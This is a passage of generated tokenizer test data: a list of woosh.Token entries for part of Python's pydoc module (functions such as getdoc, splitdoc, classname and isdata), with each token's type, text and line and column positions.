woosh.Token(woosh.NAME, 'None', 144, 15, 144, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 144, 19, 145, 0),
woosh.Token(woosh.DEDENT, ' ', 145, 0, 145, 4),
woosh.Token(woosh.NAME, 'for', 145, 4, 145, 7),
woosh.Token(woosh.NAME, 'base', 145, 8, 145, 12),
woosh.Token(woosh.NAME, 'in', 145, 13, 145, 15),
woosh.Token(woosh.NAME, 'cls', 145, 16, 145, 19),
woosh.Token(woosh.OP, '.', 145, 19, 145, 20),
woosh.Token(woosh.NAME, '__mro__', 145, 20, 145, 27),
woosh.Token(woosh.OP, ':', 145, 27, 145, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 145, 28, 146, 0),
woosh.Token(woosh.INDENT, ' ', 146, 0, 146, 8),
woosh.Token(woosh.NAME, 'try', 146, 8, 146, 11),
woosh.Token(woosh.OP, ':', 146, 11, 146, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 146, 12, 147, 0),
woosh.Token(woosh.INDENT, ' ', 147, 0, 147, 12),
woosh.Token(woosh.NAME, 'doc', 147, 12, 147, 15),
woosh.Token(woosh.OP, '=', 147, 16, 147, 17),
woosh.Token(woosh.NAME, '_getowndoc', 147, 18, 147, 28),
woosh.Token(woosh.OP, '(', 147, 28, 147, 29),
woosh.Token(woosh.NAME, 'getattr', 147, 29, 147, 36),
woosh.Token(woosh.OP, '(', 147, 36, 147, 37),
woosh.Token(woosh.NAME, 'base', 147, 37, 147, 41),
woosh.Token(woosh.OP, ',', 147, 41, 147, 42),
woosh.Token(woosh.NAME, 'name', 147, 43, 147, 47),
woosh.Token(woosh.OP, ')', 147, 47, 147, 48),
woosh.Token(woosh.OP, ')', 147, 48, 147, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 147, 49, 148, 0),
woosh.Token(woosh.DEDENT, ' ', 148, 0, 148, 8),
woosh.Token(woosh.NAME, 'except', 148, 8, 148, 14),
woosh.Token(woosh.NAME, 'AttributeError', 148, 15, 148, 29),
woosh.Token(woosh.OP, ':', 148, 29, 148, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 148, 30, 149, 0),
woosh.Token(woosh.INDENT, ' ', 149, 0, 149, 12),
woosh.Token(woosh.NAME, 'continue', 149, 12, 149, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 149, 20, 150, 0),
woosh.Token(woosh.DEDENT, ' ', 150, 0, 150, 8),
woosh.Token(woosh.NAME, 'if', 150, 8, 150, 10),
woosh.Token(woosh.NAME, 'doc', 150, 11, 150, 14),
woosh.Token(woosh.NAME, 'is', 150, 15, 150, 17),
woosh.Token(woosh.NAME, 'not', 150, 18, 150, 21),
woosh.Token(woosh.NAME, 'None', 150, 22, 150, 26),
woosh.Token(woosh.OP, ':', 150, 26, 150, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 150, 27, 151, 0),
woosh.Token(woosh.INDENT, ' ', 151, 0, 151, 12),
woosh.Token(woosh.NAME, 'return', 151, 12, 151, 18),
woosh.Token(woosh.NAME, 'doc', 151, 19, 151, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 151, 22, 152, 0),
woosh.Token(woosh.DEDENT, ' ', 152, 0, 152, 4),
woosh.Token(woosh.DEDENT, '', 152, 4, 152, 4),
woosh.Token(woosh.NAME, 'return', 152, 4, 152, 10),
woosh.Token(woosh.NAME, 'None', 152, 11, 152, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 152, 15, 153, 0),
woosh.Token(woosh.DEDENT, '', 154, 0, 154, 0),
woosh.Token(woosh.NAME, 'def', 154, 0, 154, 3),
woosh.Token(woosh.NAME, '_getowndoc', 154, 4, 154, 14),
woosh.Token(woosh.OP, '(', 154, 14, 154, 15),
woosh.Token(woosh.NAME, 'obj', 154, 15, 154, 18),
woosh.Token(woosh.OP, ')', 154, 18, 154, 19),
woosh.Token(woosh.OP, ':', 154, 19, 154, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 154, 20, 155, 0),
woosh.Token(woosh.INDENT, ' ', 155, 0, 155, 4),
woosh.Token(woosh.STRING, '"""Get the documentation string for an object if it is not\r\n inherited from its class."""', 155, 4, 156, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 156, 32, 157, 0),
woosh.Token(woosh.NAME, 'try', 157, 4, 157, 7),
woosh.Token(woosh.OP, ':', 157, 7, 157, 8),
woosh.Token(woosh.NEWLINE, '\r\n', 157, 8, 158, 0),
woosh.Token(woosh.INDENT, ' ', 158, 0, 158, 8),
woosh.Token(woosh.NAME, 'doc', 158, 8, 158, 11),
woosh.Token(woosh.OP, '=', 158, 12, 158, 13),
woosh.Token(woosh.NAME, 'object', 158, 14, 158, 20),
woosh.Token(woosh.OP, '.', 158, 20, 158, 21),
woosh.Token(woosh.NAME, '__getattribute__', 158, 21, 158, 37),
woosh.Token(woosh.OP, '(', 158, 37, 158, 38),
woosh.Token(woosh.NAME, 'obj', 158, 38, 158, 41),
woosh.Token(woosh.OP, ',', 158, 41, 158, 42),
woosh.Token(woosh.STRING, "'__doc__'", 158, 43, 158, 52),
woosh.Token(woosh.OP, ')', 158, 52, 158, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 158, 53, 159, 0),
woosh.Token(woosh.NAME, 'if', 159, 8, 159, 10),
woosh.Token(woosh.NAME, 'doc', 159, 11, 159, 14),
woosh.Token(woosh.NAME, 'is', 159, 15, 159, 17),
woosh.Token(woosh.NAME, 'None', 159, 18, 159, 22),
woosh.Token(woosh.OP, ':', 159, 22, 159, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 159, 23, 160, 0),
woosh.Token(woosh.INDENT, ' ', 160, 0, 160, 12),
woosh.Token(woosh.NAME, 'return', 160, 12, 160, 18),
woosh.Token(woosh.NAME, 'None', 160, 19, 160, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 160, 23, 161, 0),
woosh.Token(woosh.DEDENT, ' ', 161, 0, 161, 8),
woosh.Token(woosh.NAME, 'if', 161, 8, 161, 10),
woosh.Token(woosh.NAME, 'obj', 161, 11, 161, 14),
woosh.Token(woosh.NAME, 'is', 161, 15, 161, 17),
woosh.Token(woosh.NAME, 'not', 161, 18, 161, 21),
woosh.Token(woosh.NAME, 'type', 161, 22, 161, 26),
woosh.Token(woosh.OP, ':', 161, 26, 161, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 161, 27, 162, 0),
woosh.Token(woosh.INDENT, ' ', 162, 0, 162, 12),
woosh.Token(woosh.NAME, 'typedoc', 162, 12, 162, 19),
woosh.Token(woosh.OP, '=', 162, 20, 162, 21),
woosh.Token(woosh.NAME, 'type', 162, 22, 162, 26),
woosh.Token(woosh.OP, '(', 162, 26, 162, 27),
woosh.Token(woosh.NAME, 'obj', 162, 27, 162, 30),
woosh.Token(woosh.OP, ')', 162, 30, 162, 31),
woosh.Token(woosh.OP, '.', 162, 31, 162, 32),
woosh.Token(woosh.NAME, '__doc__', 162, 32, 162, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 162, 39, 163, 0),
woosh.Token(woosh.NAME, 'if', 163, 12, 163, 14),
woosh.Token(woosh.NAME, 'isinstance', 163, 15, 163, 25),
woosh.Token(woosh.OP, '(', 163, 25, 163, 26),
woosh.Token(woosh.NAME, 'typedoc', 163, 26, 163, 33),
woosh.Token(woosh.OP, ',', 163, 33, 163, 34),
woosh.Token(woosh.NAME, 'str', 163, 35, 163, 38),
woosh.Token(woosh.OP, ')', 163, 38, 163, 39),
woosh.Token(woosh.NAME, 'and', 163, 40, 163, 43),
woosh.Token(woosh.NAME, 'typedoc', 163, 44, 163, 51),
woosh.Token(woosh.OP, '==', 163, 52, 163, 54),
woosh.Token(woosh.NAME, 'doc', 163, 55, 163, 58),
woosh.Token(woosh.OP, ':', 163, 58, 163, 59),
woosh.Token(woosh.NEWLINE, '\r\n', 163, 59, 164, 0),
woosh.Token(woosh.INDENT, ' ', 164, 0, 164, 16),
woosh.Token(woosh.NAME, 'return', 164, 16, 164, 22),
woosh.Token(woosh.NAME, 'None', 164, 23, 164, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 164, 27, 165, 0),
woosh.Token(woosh.DEDENT, ' ', 165, 0, 165, 8),
woosh.Token(woosh.DEDENT, '', 165, 8, 165, 8),
woosh.Token(woosh.NAME, 'return', 165, 8, 165, 14),
woosh.Token(woosh.NAME, 'doc', 165, 15, 165, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 165, 18, 166, 0),
woosh.Token(woosh.DEDENT, ' ', 166, 0, 166, 4),
woosh.Token(woosh.NAME, 'except', 166, 4, 166, 10),
woosh.Token(woosh.NAME, 'AttributeError', 166, 11, 166, 25),
woosh.Token(woosh.OP, ':', 166, 25, 166, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 166, 26, 167, 0),
woosh.Token(woosh.INDENT, ' ', 167, 0, 167, 8),
woosh.Token(woosh.NAME, 'return', 167, 8, 167, 14),
woosh.Token(woosh.NAME, 'None', 167, 15, 167, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 167, 19, 168, 0),
woosh.Token(woosh.DEDENT, '', 169, 0, 169, 0),
woosh.Token(woosh.DEDENT, '', 169, 0, 169, 0),
woosh.Token(woosh.NAME, 'def', 169, 0, 169, 3),
woosh.Token(woosh.NAME, '_getdoc', 169, 4, 169, 11),
woosh.Token(woosh.OP, '(', 169, 11, 169, 12),
woosh.Token(woosh.NAME, 'object', 169, 12, 169, 18),
woosh.Token(woosh.OP, ')', 169, 18, 169, 19),
woosh.Token(woosh.OP, ':', 169, 19, 169, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 169, 20, 170, 0),
woosh.Token(woosh.INDENT, ' ', 170, 0, 170, 4),
woosh.Token(woosh.STRING, '"""Get the documentation string for an object.\r\n\r\n All tabs are expanded to spaces. To clean up docstrings that are\r\n indented to line up with blocks of code, any whitespace than can be\r\n uniformly removed from the second line onwards is removed."""', 170, 4, 174, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 174, 65, 175, 0),
woosh.Token(woosh.NAME, 'doc', 175, 4, 175, 7),
woosh.Token(woosh.OP, '=', 175, 8, 175, 9),
woosh.Token(woosh.NAME, '_getowndoc', 175, 10, 175, 20),
woosh.Token(woosh.OP, '(', 175, 20, 175, 21),
woosh.Token(woosh.NAME, 'object', 175, 21, 175, 27),
woosh.Token(woosh.OP, ')', 175, 27, 175, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 175, 28, 176, 0),
woosh.Token(woosh.NAME, 'if', 176, 4, 176, 6),
woosh.Token(woosh.NAME, 'doc', 176, 7, 176, 10),
woosh.Token(woosh.NAME, 'is', 176, 11, 176, 13),
woosh.Token(woosh.NAME, 'None', 176, 14, 176, 18),
woosh.Token(woosh.OP, ':', 176, 18, 176, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 176, 19, 177, 0),
woosh.Token(woosh.INDENT, ' ', 177, 0, 177, 8),
woosh.Token(woosh.NAME, 'try', 177, 8, 177, 11),
woosh.Token(woosh.OP, ':', 177, 11, 177, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 177, 12, 178, 0),
woosh.Token(woosh.INDENT, ' ', 178, 0, 178, 12),
woosh.Token(woosh.NAME, 'doc', 178, 12, 178, 15),
woosh.Token(woosh.OP, '=', 178, 16, 178, 17),
woosh.Token(woosh.NAME, '_finddoc', 178, 18, 178, 26),
woosh.Token(woosh.OP, '(', 178, 26, 178, 27),
woosh.Token(woosh.NAME, 'object', 178, 27, 178, 33),
woosh.Token(woosh.OP, ')', 178, 33, 178, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 178, 34, 179, 0),
woosh.Token(woosh.DEDENT, ' ', 179, 0, 179, 8),
woosh.Token(woosh.NAME, 'except', 179, 8, 179, 14),
woosh.Token(woosh.OP, '(', 179, 15, 179, 16),
woosh.Token(woosh.NAME, 'AttributeError', 179, 16, 179, 30),
woosh.Token(woosh.OP, ',', 179, 30, 179, 31),
woosh.Token(woosh.NAME, 'TypeError', 179, 32, 179, 41),
woosh.Token(woosh.OP, ')', 179, 41, 179, 42),
woosh.Token(woosh.OP, ':', 179, 42, 179, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 179, 43, 180, 0),
woosh.Token(woosh.INDENT, ' ', 180, 0, 180, 12),
woosh.Token(woosh.NAME, 'return', 180, 12, 180, 18),
woosh.Token(woosh.NAME, 'None', 180, 19, 180, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 180, 23, 181, 0),
woosh.Token(woosh.DEDENT, ' ', 181, 0, 181, 4),
woosh.Token(woosh.DEDENT, '', 181, 4, 181, 4),
woosh.Token(woosh.NAME, 'if', 181, 4, 181, 6),
woosh.Token(woosh.NAME, 'not', 181, 7, 181, 10),
woosh.Token(woosh.NAME, 'isinstance', 181, 11, 181, 21),
woosh.Token(woosh.OP, '(', 181, 21, 181, 22),
woosh.Token(woosh.NAME, 'doc', 181, 22, 181, 25),
woosh.Token(woosh.OP, ',', 181, 25, 181, 26),
woosh.Token(woosh.NAME, 'str', 181, 27, 181, 30),
woosh.Token(woosh.OP, ')', 181, 30, 181, 31),
woosh.Token(woosh.OP, ':', 181, 31, 181, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 181, 32, 182, 0),
woosh.Token(woosh.INDENT, ' ', 182, 0, 182, 8),
woosh.Token(woosh.NAME, 'return', 182, 8, 182, 14),
woosh.Token(woosh.NAME, 'None', 182, 15, 182, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 182, 19, 183, 0),
woosh.Token(woosh.DEDENT, ' ', 183, 0, 183, 4),
woosh.Token(woosh.NAME, 'return', 183, 4, 183, 10),
woosh.Token(woosh.NAME, 'inspect', 183, 11, 183, 18),
woosh.Token(woosh.OP, '.', 183, 18, 183, 19),
woosh.Token(woosh.NAME, 'cleandoc', 183, 19, 183, 27),
woosh.Token(woosh.OP, '(', 183, 27, 183, 28),
woosh.Token(woosh.NAME, 'doc', 183, 28, 183, 31),
woosh.Token(woosh.OP, ')', 183, 31, 183, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 183, 32, 184, 0),
woosh.Token(woosh.DEDENT, '', 185, 0, 185, 0),
woosh.Token(woosh.NAME, 'def', 185, 0, 185, 3),
woosh.Token(woosh.NAME, 'getdoc', 185, 4, 185, 10),
woosh.Token(woosh.OP, '(', 185, 10, 185, 11),
woosh.Token(woosh.NAME, 'object', 185, 11, 185, 17),
woosh.Token(woosh.OP, ')', 185, 17, 185, 18),
woosh.Token(woosh.OP, ':', 185, 18, 185, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 185, 19, 186, 0),
woosh.Token(woosh.INDENT, ' ', 186, 0, 186, 4),
woosh.Token(woosh.STRING, '"""Get the doc string or comments for an object."""', 186, 4, 186, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 186, 55, 187, 0),
woosh.Token(woosh.NAME, 'result', 187, 4, 187, 10),
woosh.Token(woosh.OP, '=', 187, 11, 187, 12),
woosh.Token(woosh.NAME, '_getdoc', 187, 13, 187, 20),
woosh.Token(woosh.OP, '(', 187, 20, 187, 21),
woosh.Token(woosh.NAME, 'object', 187, 21, 187, 27),
woosh.Token(woosh.OP, ')', 187, 27, 187, 28),
woosh.Token(woosh.NAME, 'or', 187, 29, 187, 31),
woosh.Token(woosh.NAME, 'inspect', 187, 32, 187, 39),
woosh.Token(woosh.OP, '.', 187, 39, 187, 40),
woosh.Token(woosh.NAME, 'getcomments', 187, 40, 187, 51),
woosh.Token(woosh.OP, '(', 187, 51, 187, 52),
woosh.Token(woosh.NAME, 'object', 187, 52, 187, 58),
woosh.Token(woosh.OP, ')', 187, 58, 187, 59),
woosh.Token(woosh.NEWLINE, '\r\n', 187, 59, 188, 0),
woosh.Token(woosh.NAME, 'return', 188, 4, 188, 10),
woosh.Token(woosh.NAME, 'result', 188, 11, 188, 17),
woosh.Token(woosh.NAME, 'and', 188, 18, 188, 21),
woosh.Token(woosh.NAME, 're', 188, 22, 188, 24),
woosh.Token(woosh.OP, '.', 188, 24, 188, 25),
woosh.Token(woosh.NAME, 'sub', 188, 25, 188, 28),
woosh.Token(woosh.OP, '(', 188, 28, 188, 29),
woosh.Token(woosh.STRING, "'^ *\\n'", 188, 29, 188, 36),
woosh.Token(woosh.OP, ',', 188, 36, 188, 37),
woosh.Token(woosh.STRING, "''", 188, 38, 188, 40),
woosh.Token(woosh.OP, ',', 188, 40, 188, 41),
woosh.Token(woosh.NAME, 'result', 188, 42, 188, 48),
woosh.Token(woosh.OP, '.', 188, 48, 188, 49),
woosh.Token(woosh.NAME, 'rstrip', 188, 49, 188, 55),
woosh.Token(woosh.OP, '(', 188, 55, 188, 56),
woosh.Token(woosh.OP, ')', 188, 56, 188, 57),
woosh.Token(woosh.OP, ')', 188, 57, 188, 58),
woosh.Token(woosh.NAME, 'or', 188, 59, 188, 61),
woosh.Token(woosh.STRING, "''", 188, 62, 188, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 188, 64, 189, 0),
woosh.Token(woosh.DEDENT, '', 190, 0, 190, 0),
woosh.Token(woosh.NAME, 'def', 190, 0, 190, 3),
woosh.Token(woosh.NAME, 'splitdoc', 190, 4, 190, 12),
woosh.Token(woosh.OP, '(', 190, 12, 190, 13),
woosh.Token(woosh.NAME, 'doc', 190, 13, 190, 16),
woosh.Token(woosh.OP, ')', 190, 16, 190, 17),
woosh.Token(woosh.OP, ':', 190, 17, 190, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 190, 18, 191, 0),
woosh.Token(woosh.INDENT, ' ', 191, 0, 191, 4),
woosh.Token(woosh.STRING, '"""Split a doc string into a synopsis line (if any) and the rest."""', 191, 4, 191, 72),
woosh.Token(woosh.NEWLINE, '\r\n', 191, 72, 192, 0),
woosh.Token(woosh.NAME, 'lines', 192, 4, 192, 9),
woosh.Token(woosh.OP, '=', 192, 10, 192, 11),
woosh.Token(woosh.NAME, 'doc', 192, 12, 192, 15),
woosh.Token(woosh.OP, '.', 192, 15, 192, 16),
woosh.Token(woosh.NAME, 'strip', 192, 16, 192, 21),
woosh.Token(woosh.OP, '(', 192, 21, 192, 22),
woosh.Token(woosh.OP, ')', 192, 22, 192, 23),
woosh.Token(woosh.OP, '.', 192, 23, 192, 24),
woosh.Token(woosh.NAME, 'split', 192, 24, 192, 29),
woosh.Token(woosh.OP, '(', 192, 29, 192, 30),
woosh.Token(woosh.STRING, "'\\n'", 192, 30, 192, 34),
woosh.Token(woosh.OP, ')', 192, 34, 192, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 192, 35, 193, 0),
woosh.Token(woosh.NAME, 'if', 193, 4, 193, 6),
woosh.Token(woosh.NAME, 'len', 193, 7, 193, 10),
woosh.Token(woosh.OP, '(', 193, 10, 193, 11),
woosh.Token(woosh.NAME, 'lines', 193, 11, 193, 16),
woosh.Token(woosh.OP, ')', 193, 16, 193, 17),
woosh.Token(woosh.OP, '==', 193, 18, 193, 20),
woosh.Token(woosh.NUMBER, '1', 193, 21, 193, 22),
woosh.Token(woosh.OP, ':', 193, 22, 193, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 193, 23, 194, 0),
woosh.Token(woosh.INDENT, ' ', 194, 0, 194, 8),
woosh.Token(woosh.NAME, 'return', 194, 8, 194, 14),
woosh.Token(woosh.NAME, 'lines', 194, 15, 194, 20),
woosh.Token(woosh.OP, '[', 194, 20, 194, 21),
woosh.Token(woosh.NUMBER, '0', 194, 21, 194, 22),
woosh.Token(woosh.OP, ']', 194, 22, 194, 23),
woosh.Token(woosh.OP, ',', 194, 23, 194, 24),
woosh.Token(woosh.STRING, "''", 194, 25, 194, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 194, 27, 195, 0),
woosh.Token(woosh.DEDENT, ' ', 195, 0, 195, 4),
woosh.Token(woosh.NAME, 'elif', 195, 4, 195, 8),
woosh.Token(woosh.NAME, 'len', 195, 9, 195, 12),
woosh.Token(woosh.OP, '(', 195, 12, 195, 13),
woosh.Token(woosh.NAME, 'lines', 195, 13, 195, 18),
woosh.Token(woosh.OP, ')', 195, 18, 195, 19),
woosh.Token(woosh.OP, '>=', 195, 20, 195, 22),
woosh.Token(woosh.NUMBER, '2', 195, 23, 195, 24),
woosh.Token(woosh.NAME, 'and', 195, 25, 195, 28),
woosh.Token(woosh.NAME, 'not', 195, 29, 195, 32),
woosh.Token(woosh.NAME, 'lines', 195, 33, 195, 38),
woosh.Token(woosh.OP, '[', 195, 38, 195, 39),
woosh.Token(woosh.NUMBER, '1', 195, 39, 195, 40),
woosh.Token(woosh.OP, ']', 195, 40, 195, 41),
woosh.Token(woosh.OP, '.', 195, 41, 195, 42),
woosh.Token(woosh.NAME, 'rstrip', 195, 42, 195, 48),
woosh.Token(woosh.OP, '(', 195, 48, 195, 49),
woosh.Token(woosh.OP, ')', 195, 49, 195, 50),
woosh.Token(woosh.OP, ':', 195, 50, 195, 51),
woosh.Token(woosh.NEWLINE, '\r\n', 195, 51, 196, 0),
woosh.Token(woosh.INDENT, ' ', 196, 0, 196, 8),
woosh.Token(woosh.NAME, 'return', 196, 8, 196, 14),
woosh.Token(woosh.NAME, 'lines', 196, 15, 196, 20),
woosh.Token(woosh.OP, '[', 196, 20, 196, 21),
woosh.Token(woosh.NUMBER, '0', 196, 21, 196, 22),
woosh.Token(woosh.OP, ']', 196, 22, 196, 23),
woosh.Token(woosh.OP, ',', 196, 23, 196, 24),
woosh.Token(woosh.STRING, "'\\n'", 196, 25, 196, 29),
woosh.Token(woosh.OP, '.', 196, 29, 196, 30),
woosh.Token(woosh.NAME, 'join', 196, 30, 196, 34),
woosh.Token(woosh.OP, '(', 196, 34, 196, 35),
woosh.Token(woosh.NAME, 'lines', 196, 35, 196, 40),
woosh.Token(woosh.OP, '[', 196, 40, 196, 41),
woosh.Token(woosh.NUMBER, '2', 196, 41, 196, 42),
woosh.Token(woosh.OP, ':', 196, 42, 196, 43),
woosh.Token(woosh.OP, ']', 196, 43, 196, 44),
woosh.Token(woosh.OP, ')', 196, 44, 196, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 196, 45, 197, 0),
woosh.Token(woosh.DEDENT, ' ', 197, 0, 197, 4),
woosh.Token(woosh.NAME, 'return', 197, 4, 197, 10),
woosh.Token(woosh.STRING, "''", 197, 11, 197, 13),
woosh.Token(woosh.OP, ',', 197, 13, 197, 14),
woosh.Token(woosh.STRING, "'\\n'", 197, 15, 197, 19),
woosh.Token(woosh.OP, '.', 197, 19, 197, 20),
woosh.Token(woosh.NAME, 'join', 197, 20, 197, 24),
woosh.Token(woosh.OP, '(', 197, 24, 197, 25),
woosh.Token(woosh.NAME, 'lines', 197, 25, 197, 30),
woosh.Token(woosh.OP, ')', 197, 30, 197, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 197, 31, 198, 0),
woosh.Token(woosh.DEDENT, '', 199, 0, 199, 0),
woosh.Token(woosh.NAME, 'def', 199, 0, 199, 3),
woosh.Token(woosh.NAME, 'classname', 199, 4, 199, 13),
woosh.Token(woosh.OP, '(', 199, 13, 199, 14),
woosh.Token(woosh.NAME, 'object', 199, 14, 199, 20),
woosh.Token(woosh.OP, ',', 199, 20, 199, 21),
woosh.Token(woosh.NAME, 'modname', 199, 22, 199, 29),
woosh.Token(woosh.OP, ')', 199, 29, 199, 30),
woosh.Token(woosh.OP, ':', 199, 30, 199, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 199, 31, 200, 0),
woosh.Token(woosh.INDENT, ' ', 200, 0, 200, 4),
woosh.Token(woosh.STRING, '"""Get a class name and qualify it with a module name if necessary."""', 200, 4, 200, 74),
woosh.Token(woosh.NEWLINE, '\r\n', 200, 74, 201, 0),
woosh.Token(woosh.NAME, 'name', 201, 4, 201, 8),
woosh.Token(woosh.OP, '=', 201, 9, 201, 10),
woosh.Token(woosh.NAME, 'object', 201, 11, 201, 17),
woosh.Token(woosh.OP, '.', 201, 17, 201, 18),
woosh.Token(woosh.NAME, '__name__', 201, 18, 201, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 201, 26, 202, 0),
woosh.Token(woosh.NAME, 'if', 202, 4, 202, 6),
woosh.Token(woosh.NAME, 'object', 202, 7, 202, 13),
woosh.Token(woosh.OP, '.', 202, 13, 202, 14),
woosh.Token(woosh.NAME, '__module__', 202, 14, 202, 24),
woosh.Token(woosh.OP, '!=', 202, 25, 202, 27),
woosh.Token(woosh.NAME, 'modname', 202, 28, 202, 35),
woosh.Token(woosh.OP, ':', 202, 35, 202, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 202, 36, 203, 0),
woosh.Token(woosh.INDENT, ' ', 203, 0, 203, 8),
woosh.Token(woosh.NAME, 'name', 203, 8, 203, 12),
woosh.Token(woosh.OP, '=', 203, 13, 203, 14),
woosh.Token(woosh.NAME, 'object', 203, 15, 203, 21),
woosh.Token(woosh.OP, '.', 203, 21, 203, 22),
woosh.Token(woosh.NAME, '__module__', 203, 22, 203, 32),
woosh.Token(woosh.OP, '+', 203, 33, 203, 34),
woosh.Token(woosh.STRING, "'.'", 203, 35, 203, 38),
woosh.Token(woosh.OP, '+', 203, 39, 203, 40),
woosh.Token(woosh.NAME, 'name', 203, 41, 203, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 203, 45, 204, 0),
woosh.Token(woosh.DEDENT, ' ', 204, 0, 204, 4),
woosh.Token(woosh.NAME, 'return', 204, 4, 204, 10),
woosh.Token(woosh.NAME, 'name', 204, 11, 204, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 204, 15, 205, 0),
woosh.Token(woosh.DEDENT, '', 206, 0, 206, 0),
woosh.Token(woosh.NAME, 'def', 206, 0, 206, 3),
woosh.Token(woosh.NAME, 'isdata', 206, 4, 206, 10),
woosh.Token(woosh.OP, '(', 206, 10, 206, 11),
woosh.Token(woosh.NAME, 'object', 206, 11, 206, 17),
woosh.Token(woosh.OP, ')', 206, 17, 206, 18),
woosh.Token(woosh.OP, ':', 206, 18, 206, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 206, 19, 207, 0),
woosh.Token(woosh.INDENT, ' ', 207, 0, 207, 4),
woosh.Token(woosh.STRING, '"""Check if an object is of a type that probably means it\'s data."""', 207, 4, 207, 72),
woosh.Token(woosh.NEWLINE, '\r\n', 207, 72, 208, 0),
woosh.Token(woosh.NAME, 'return', 208, 4, 208, 10),
woosh.Token(woosh.NAME, 'not', 208, 11, 208, 14),
woosh.Token(woosh.OP, '(', 208, 15, 208, 16),
woosh.Token(woosh.NAME, 'inspect', 208, 16, 208, 23),
woosh.Token(woosh.OP, '.', 208, 23, 208, 24),
woosh.Token(woosh.NAME, 'ismodule', 208, 24, 208, 32),
woosh.Token(woosh.OP, '(', 208, 32, 208, 33),
woosh.Token(woosh.NAME, 'object', 208, 33, 208, 39),
woosh.Token(woosh.OP, ')', 208, 39, 208, 40),
woosh.Token(woosh.NAME, 'or', 208, 41, 208, 43),
woosh.Token(woosh.NAME, 'inspect', 208, 44, 208, 51),
woosh.Token(woosh.OP, '.', 208, 51, 208, 52),
woosh.Token(woosh.NAME, 'isclass', 208, 52, 208, 59),
woosh.Token(woosh.OP, '(', 208, 59, 208, 60),
woosh.Token(woosh.NAME, 'object', 208, 60, 208, 66),
woosh.Token(woosh.OP, ')', 208, 66, 208, 67),
woosh.Token(woosh.NAME, 'or', 208, 68, 208, 70),
woosh.Token(woosh.NAME, 'inspect', 209, 16, 209, 23),
woosh.Token(woosh.OP, '.', 209, 23, 209, 24),
woosh.Token(woosh.NAME, 'isroutine', 209, 24, 209, 33),
woosh.Token(woosh.OP, '(', 209, 33, 209, 34),
woosh.Token(woosh.NAME, 'object', 209, 34, 209, 40),
woosh.Token(woosh.OP, ')', 209, 40, 209, 41),
woosh.Token(woosh.NAME, 'or', 209, 42, 209, 44),
woosh.Token(woosh.NAME, 'inspect', 209, 45, 209, 52),
woosh.Token(woosh.OP, '.', 209, 52, 209, 53),
woosh.Token(woosh.NAME, 'isframe', 209, 53, 209, 60),
woosh.Token(woosh.OP, '(', 209, 60, 209, 61),
woosh.Token(woosh.NAME, 'object', 209, 61, 209, 67),
woosh.Token(woosh.OP, ')', 209, 67, 209, 68),
woosh.Token(woosh.NAME, 'or', 209, 69, 209, 71),
woosh.Token(woosh.NAME, 'inspect', 210, 16, 210, 23),
woosh.Token(woosh.OP, '.', 210, 23, 210, 24),
woosh.Token(woosh.NAME, 'istraceback', 210, 24, 210, 35),
woosh.Token(woosh.OP, '(', 210, 35, 210, 36),
woosh.Token(woosh.NAME, 'object', 210, 36, 210, 42),
woosh.Token(woosh.OP, ')', 210, 42, 210, 43),
woosh.Token(woosh.NAME, 'or', 210, 44, 210, 46),
woosh.Token(woosh.NAME, 'inspect', 210, 47, 210, 54),
woosh.Token(woosh.OP, '.', 210, 54, 210, 55),
woosh.Token(woosh.NAME, 'iscode', 210, 55, 210, 61),
woosh.Token(woosh.OP, '(', 210, 61, 210, 62),
woosh.Token(woosh.NAME, 'object', 210, 62, 210, 68),
woosh.Token(woosh.OP, ')', 210, 68, 210, 69),
woosh.Token(woosh.OP, ')', 210, 69, 210, 70),
woosh.Token(woosh.NEWLINE, '\r\n', 210, 70, 211, 0),
woosh.Token(woosh.DEDENT, '', 212, 0, 212, 0),
woosh.Token(woosh.NAME, 'def', 212, 0, 212, 3),
woosh.Token(woosh.NAME, 'replace', 212, 4, 212, 11),
woosh.Token(woosh.OP, '(', 212, 11, 212, 12),
woosh.Token(woosh.NAME, 'text', 212, 12, 212, 16),
woosh.Token(woosh.OP, ',', 212, 16, 212, 17),
woosh.Token(woosh.OP, '*', 212, 18, 212, 19),
woosh.Token(woosh.NAME, 'pairs', 212, 19, 212, 24),
